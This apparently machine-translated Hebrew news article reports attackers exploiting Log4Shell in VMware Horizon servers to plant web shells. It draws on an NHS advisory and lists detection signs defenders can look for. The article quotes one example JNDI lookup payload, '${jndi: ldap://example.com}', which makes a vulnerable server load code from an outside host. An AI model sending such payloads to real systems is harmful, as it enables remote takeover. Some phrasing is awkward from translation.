![מערכות תיקון פגיעות לליקויים קריטיים ב-Log4j, מזהירים בכירים בבריטניה וארה](/f/6596b32419ca937a6ce17648f8c8236f.jpeg)
Getty Images
פושעים מנצלים באופן פעיל את הפגיעות בחומרה הגבוהה של Log4Shell בשרתים המריצים VMware Horizon בניסיון להתקין תוכנות זדוניות המאפשרות להם להשיג שליטה מלאה על המערכות המושפעות, כך מערכת הבריאות הממומנת על ידי הציבור בבריטניה אַזהָרָה.
CVE-2021-44228 היא אחת הפגיעות החמורות ביותר שהתגלו בשנים האחרונות. הוא שוכן ב-Log4J, ספריית קוד רישום מערכת המשמשת באלפי אם לא מיליוני יישומים ואתרי אינטרנט של צד שלישי. זה אומר שיש בסיס עצום של מערכות פגיעות. בנוסף, הפגיעות קלה ביותר לניצול ומאפשרת לתוקפים להתקין קונכיות אינטרנט, המספקות חלון פקודה לביצוע פקודות מורשות מאוד בשרתים פרוצים.
לקריאה נוספת
יום אפס בכלי Log4j בכל מקום מהווה איום חמור על האינטרנטההתקפות, כולל כאלה המכוונות ל-VMware Horizon, נמשכות מאז אותה תקופה.
"נצפתה קבוצת איומים לא ידועה המכוונת לשרתי VMware Horizon המריצים גרסאות שהושפעו על ידי נקודות תורפה של Log4Shell
על מנת לבסס התמדה בתוך רשתות מושפעות", גורמים רשמיים עם מערכת הבריאות הלאומית של בריטניה כתבתי. הם המשיכו לספק הנחיות לגבי צעדים ספציפיים שארגונים מושפעים יכולים לנקוט כדי להפחית את האיום.העיקרית ביניהם היא ההמלצה להתקין עדכון זה VMware שוחררה עבור מוצר Horizon שלה, שנותן לארגונים אמצעים לווירטואליזציה של יכולות שולחן העבודה והאפליקציות באמצעות טכנולוגיית הוירטואליזציה של החברה. פקידי NHS ציינו גם סימנים שארגונים פגיעים יכולים לחפש כדי לזהות כל התקפות אפשריות שהם ספגו.
לקריאה נוספת
מדוע הפרת Equifax היא אולי הדליפה הגרועה ביותר של מידע אישי אי פעם"ה-FTC מתכוון להשתמש בסמכות החוקית המלאה שלו כדי לרדוף אחרי חברות שלא נוקטות בצעדים סבירים להגן על נתוני צרכנים מפני חשיפה כתוצאה מ-Log4j או פגיעויות ידועות דומות בעתיד", FTC פקידים אמר
ה-NHS הוא לפחות הארגון השני שראה ניצולים המכוונים למוצר VMware. בחודש שעבר, חוקרים דיווח שתוקפים כוונו למערכות המרצות את VMware VCenter במטרה להתקין את תוכנת הכופר Conti.
ההתקפות המכוונות לשרתי VMware Horizon ללא תיקון מכוונות לשימוש שלה בשירות קוד פתוח.
"סביר להניח שהמתקפה יזומה באמצעות מטען Log4Shell הדומה ל-${jndi: ldap://example.com}", קבע הייעוץ של NHS. "ההתקפה מנצלת את הפגיעות של Log4Shell בשירות Apache Tomcat המוטמע בתוך VMware Horizon. זה מפעיל את פקודת PowerShell הבאה, שהולידה מ-ws_TomcatService.exe:"
![](/f/86235713fcabe2c116a5e345a58e526f.png)
NHS
לאחר מספר שלבים נוספים, התוקפים מסוגלים להתקין מעטפת אינטרנט בעלת תקשורת מתמשכת עם שרת שהם שולטים בהם. הנה ייצוג של המתקפה:
![](/f/30a275c4cc9b928fd4a3e5b49f2fa8b8.png)
NHS
הייעוץ הוסיף:
ארגונים צריכים לחפש את הדברים הבאים:
- עדות ל ws_TomcatService.exe הולידת תהליכים חריגים
- כל powershell.exe תהליכים המכילים 'VMBlastSG' בשורת הפקודה
- שינויים בקבצים ל'...\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js' - קובץ זה מוחלף בדרך כלל במהלך שדרוגים, ואינו משתנה
חברת האבטחה Praetorian שוחררה ביום שישי הכלי הזה לזיהוי מערכות פגיעות בקנה מידה.